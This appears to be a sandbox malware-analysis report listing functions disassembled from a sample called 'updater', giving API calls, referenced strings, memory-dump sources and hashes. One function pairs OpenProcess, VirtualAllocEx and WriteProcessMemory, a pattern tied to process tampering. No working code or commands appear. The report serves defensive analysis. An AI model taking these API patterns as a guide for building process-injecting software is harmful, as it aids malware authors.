Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 9548f61f45f8608c589bfbcee82694c104dde0753adf7b846924743691f84a11
Instruction ID: a0049cbdb50d969f419db44a7783fdeb6ca2a0c75afc0d998fb41ca29418d0a1
Opcode Fuzzy Hash: 9548f61f45f8608c589bfbcee82694c104dde0753adf7b846924743691f84a11
Instruction Fuzzy Hash: 3FF0C930009209ABDB2B9F25FC4D79D3BA8A705326F148216E529552F0E7314995EF11

Function 0031E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00330FE6: std::exception::exception.LIBCMT ref: 0033101C
Part of subcall function 00330FE6: __CxxThrowException@8.LIBCMT ref: 00331031

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 00321680: _memmove.LIBCMT ref: 003216DB

__swprintf.LIBCMT ref: 0031E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0031E431

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: afe7026fd4b9b97e5e4979021d5b57ad25fc3fd4e527115c5a2070307032926c
Instruction ID: 432efaf13f4d997f68f5bf04fd17554111c4d6e9179a2c1230dfbde2beb871c0
Opcode Fuzzy Hash: afe7026fd4b9b97e5e4979021d5b57ad25fc3fd4e527115c5a2070307032926c
Instruction Fuzzy Hash: 729193715082519FC71AEF24D995C6FB7B8EF99300F41491DF8459B2A1EB30ED48CB92

Function 0033523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 003352CD

Part of subcall function 00340320: __87except.LIBCMT ref: 0034035B

Strings

pow, xrefs: 003352A5, 003352C2

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: f850aea9d475d4fca2b022956aa340c9d28b53d96821175005385b578bbe5349
Instruction ID: 33691b8c6fa44c9fe81221f6deb60d03321aef309d6f7ab309d047972e483c82
Opcode Fuzzy Hash: f850aea9d475d4fca2b022956aa340c9d28b53d96821175005385b578bbe5349
Instruction Fuzzy Hash: 9E517925F09A0197CB1BBB15C98136A7BD8DB00760F254D68E6C1CE6E5EF389CC49E42

Function 00330654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00330690
#, xrefs: 00330699

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 08d24e43695f61dfe5e2863fbca988904fc3980b6bd43d2946b7ad0a992f2090
Instruction ID: d1f311b3e7674474d08c9ce646889c0acc6d0364212e2e06feaea5c33303b885
Opcode Fuzzy Hash: 08d24e43695f61dfe5e2863fbca988904fc3980b6bd43d2946b7ad0a992f2090
Instruction Fuzzy Hash: 55512575500255CFDF1BDF68C892AFA7BA8EF55314F158055FC92AB290D734AC82CBA0

Function 0031E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0031E937
_memmove.LIBCMT ref: 0031E9D0
_free.LIBCMT ref: 0031E9F6
_memmove.LIBCMT ref: 0031EAA9

Strings

#V2, xrefs: 0031E9E2

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memmove$_free
String ID: #V2
API String ID: 2620147621-3783035641
Opcode ID: d132a5681362aa41c7a4a96a0e15ff82237f805e49749556237cc4269593cd0b
Instruction ID: f8fdf14cd66b724f69b97aa7efc78d3f737cd3ecf6a345c9e9fcd978909edc7e
Opcode Fuzzy Hash: d132a5681362aa41c7a4a96a0e15ff82237f805e49749556237cc4269593cd0b
Instruction Fuzzy Hash: D8514B71A083418FDB29CF28C491B6BB7E5BF89314F15492DE98987261E732E845CB52

Function 016D9679 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,016D9843,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 016D96A8

Part of subcall function 016D9341: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 016D935F

Strings

eeee, xrefs: 016D97B3
ggg, xrefs: 016D978D
yyyy, xrefs: 016D979A

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: a91cea249b6e133984f4ecbd85ca44c2bd19e8e3defaca646e4e7a8c683f0bf0
Instruction ID: 1b42f68a71a35cc1d59f4e2a8bada258e31da71d9a1251016c4dad3cfa357b4c
Opcode Fuzzy Hash: a91cea249b6e133984f4ecbd85ca44c2bd19e8e3defaca646e4e7a8c683f0bf0
Instruction Fuzzy Hash: 8E410674F041068BD711AFB9CC926FEF7ABEB6670CB554929D462D7304EA30D902C366

Function 0032CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0032CFC2
_memmove.LIBCMT ref: 0032D060
_memset.LIBCMT ref: 0032D084

Strings

ERCP, xrefs: 0032CF2D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 79899a2969e31645e4abe5e4886cb1380357667c55ac084c8b63c8fa83e01df1
Instruction ID: 2ac2fb9b8196fc46e41ed8fcb535aee8539ab859657909cf09998d7c1293a56e
Opcode Fuzzy Hash: 79899a2969e31645e4abe5e4886cb1380357667c55ac084c8b63c8fa83e01df1
Instruction Fuzzy Hash: EA51F6719007199FDB26CF65D885BAABBF8EF04314F24C56EE94ACB251E730D985CB40

Function 0036A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00371CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00369E4E,?,?,00000034,00000800,?,00000034), ref: 00371CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0036A3F7

Part of subcall function 00371C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00369E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00371CB0

Part of subcall function 00371BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00371C08
Part of subcall function 00371BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00369E12,00000034,?,?,00001004,00000000,00000000), ref: 00371C18
Part of subcall function 00371BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00369E12,00000034,?,?,00001004,00000000,00000000), ref: 00371C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0036A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0036A4B1

Strings

@, xrefs: 0036A4C9

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 9a23f6a9879e922c2e7f9c3aefbc58d94b7cc06bd754b77888acca9718cc0329
Instruction ID: 4905dbbbe0cd96bdadd7d0dc63dd55dba566072ea0ef3682c18e9ceff9a73cf1
Opcode Fuzzy Hash: 9a23f6a9879e922c2e7f9c3aefbc58d94b7cc06bd754b77888acca9718cc0329
Instruction Fuzzy Hash: F0413D7294021CBFDB22DBA4CD85ADEB7B8EF45300F008095FA55BB290DA706E45CFA1

Function 003979FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00397A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00397A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00397ABE

Strings

SysMonthCal32, xrefs: 00397A51

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 023e97e97e72b8f4e0e6283720365f646644c5b02e2073123fa75a9b7c022a1a
Instruction ID: f71550c57bb00b647bf1d474e9b77364e8e855dc8cf15ad1e0dc92ebff6bfc79
Opcode Fuzzy Hash: 023e97e97e72b8f4e0e6283720365f646644c5b02e2073123fa75a9b7c022a1a
Instruction Fuzzy Hash: 3221A332610219BFDF269F54CC46FEE3B69EF48714F110214FE156B1D0D6B5AC549B90

Function 003981B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0039826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0039827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00398284

Strings

msctls_updown32, xrefs: 003981E9

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 1659d17d13d3e880a0d9e42b3b0c458093dfabb4d269f268e1c80104c31f390a
Instruction ID: cd7e620fe2db824613b71bc09aa920e7bf84b17744bbff1946bc8f41a2e2175d
Opcode Fuzzy Hash: 1659d17d13d3e880a0d9e42b3b0c458093dfabb4d269f268e1c80104c31f390a
Instruction Fuzzy Hash: EF21B0B1604208AFDF02DF64DCC5DA737EDEB8A364B050459FA009B261CB30EC11CBA0

Function 003972D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00397360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00397370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00397395

Strings

Listbox, xrefs: 0039732D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 50a96ad4fe3abc8169c20790c354d4184f6cac109786877f2372f6b6928ec295
Instruction ID: 29739b7a9f983d0eec4bdb85d287a087ed2d1c2b7b62b43230da08fe5f65fafd
Opcode Fuzzy Hash: 50a96ad4fe3abc8169c20790c354d4184f6cac109786877f2372f6b6928ec295
Instruction Fuzzy Hash: E021BE32624118BFDF178F54DC85EFF37AAEB89764F128124F9449B1A0C671AC519BA0

Function 016E9A1D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,016EA458,0000001C,?,016E9A9D,0000001C), ref: 016E9A3C
GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 016E9A49

Strings

kernel32.dll, xrefs: 016E9A37
VirtualQueryEx, xrefs: 016E9A43

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VirtualQueryEx$kernel32.dll
API String ID: 1646373207-930368515
Opcode ID: a2e90c3a9e420277ade59eca51f522918fb410485a4da7f00018b34879360f73
Instruction ID: aa1666bc12924b2259aa16d7b5b81e2d5efd968479b1e263fbff17b13212c409
Opcode Fuzzy Hash: a2e90c3a9e420277ade59eca51f522918fb410485a4da7f00018b34879360f73
Instruction Fuzzy Hash: 16E02B726092053AA300E6BD5C09CAFABECCEC6730B60531DB928831D1E6300D018264

Function 016E9A29 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,016EA458,0000001C,?,016E9A9D,0000001C), ref: 016E9A3C
GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 016E9A49

Strings

kernel32.dll, xrefs: 016E9A37
VirtualQueryEx, xrefs: 016E9A43

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VirtualQueryEx$kernel32.dll
API String ID: 1646373207-930368515
Opcode ID: 14d6ac8fc680d264c598e50337b3a6a35587dda5de471355b4c05bde9da5c767
Instruction ID: 3364ed2fbdb6fbf45a8d23b6ecc05545aed55766aca30c94b79eb7d635d5676d
Opcode Fuzzy Hash: 14d6ac8fc680d264c598e50337b3a6a35587dda5de471355b4c05bde9da5c767
Instruction Fuzzy Hash: 1DE0867260A2047E6700E6DBAC49CAFB7EDCDD5764310932EF60C83200E9705E0182B4

Function 0034B4F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0034B544: _memset.LIBCMT ref: 0034B551

Part of subcall function 00330B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0034B520,?,?,?,0031100A), ref: 00330B79

IsDebuggerPresent.KERNEL32(?,?,?,0031100A), ref: 0034B524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0031100A), ref: 0034B533

Strings

=;, xrefs: 0034B514
ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0034B52E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=;
API String ID: 3158253471-1169783345
Opcode ID: 655b6a286631738a4cfcd59ab26811fe6d6e0102af713b77599ad114186b63d3
Instruction ID: ee8877402b78c0faf842509ed895cf3ebb0102b35ef5213a61e975ac86e94bc0
Opcode Fuzzy Hash: 655b6a286631738a4cfcd59ab26811fe6d6e0102af713b77599ad114186b63d3
Instruction Fuzzy Hash: 5CE06D742003218BD7269F39E404782FAE4AF19708F00895DE486CAB41EBB5E544CBA1

Function 00324B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00324B44,?,003249D4,?,?,003227AF,?,00000001), ref: 00324B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00324B97

Strings

Wow64DisableWow64FsRedirection, xrefs: 00324B91
kernel32.dll, xrefs: 00324B80

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: c86e6e2f031e9de06f5b7ce574dcdba8b7b6627c7a879b68dc374ec2319f1a61
Instruction ID: bec7e576ee5d5906035bffc3adbba41ef5872275ec9e274d7259102c858c098a
Opcode Fuzzy Hash: c86e6e2f031e9de06f5b7ce574dcdba8b7b6627c7a879b68dc374ec2319f1a61
Instruction Fuzzy Hash: 55D017745107228FD7269F31EC58B867AE8AF0A391F12882ED8C6E2560E770E880CB10

Function 00324BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00324AF7,?), ref: 00324BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00324BCA

Strings

kernel32.dll, xrefs: 00324BB3
Wow64RevertWow64FsRedirection, xrefs: 00324BC4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 37f48dc4edbc542a6573eb5577c089c5353e3cbc98df939154fb268d5c6a7f62
Instruction ID: 67904ce20989edff914ff0f1c0bc5dceacf6753138c29e53b0c40b5109874cf3
Opcode Fuzzy Hash: 37f48dc4edbc542a6573eb5577c089c5353e3cbc98df939154fb268d5c6a7f62
Instruction Fuzzy Hash: 7ED01774510722CFD7269F31EC48B8776E9AF06391F129C6ED8C6D2564EBB0D880CA10

Function 00391447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00391696), ref: 00391455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00391467

Strings

RegDeleteKeyExW, xrefs: 00391461
advapi32.dll, xrefs: 00391450

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: f75a48119c7a4e83a73f4e5aff4a5e42df3e369d11fb45f88906bd832fa5a3f6
Instruction ID: b066a86db6f0474a613265ea98980307734b052c91848cb231d873336cd867d4
Opcode Fuzzy Hash: f75a48119c7a4e83a73f4e5aff4a5e42df3e369d11fb45f88906bd832fa5a3f6
Instruction Fuzzy Hash: A3D012355107138FDB225F76C80878676E8AF06395F15C82ED4D6E2150DA70D8C0C710

Function 003255F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00325E3D), ref: 003255FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00325610

Strings

GetNativeSystemInfo, xrefs: 0032560A
kernel32.dll, xrefs: 003255F9

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 89e276772502adfb5cc2b14446ab32055c6af06b3aff1766bd94ea0899e9b7f3
Instruction ID: ecdea16bea0fc3465b063ba27b6912f61153887a1a9d35fee20b7c37df2b791e
Opcode Fuzzy Hash: 89e276772502adfb5cc2b14446ab32055c6af06b3aff1766bd94ea0899e9b7f3
Instruction Fuzzy Hash: 95D05E78920B22CFE7269F31DC0879776E8EF06795F12D82ED4C6D22A1E770C880CA50

Function 003897CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,003893DE,?,003A0980), ref: 003897D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003897EA

Strings

kernel32.dll, xrefs: 003897D3
GetModuleHandleExW, xrefs: 003897E4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
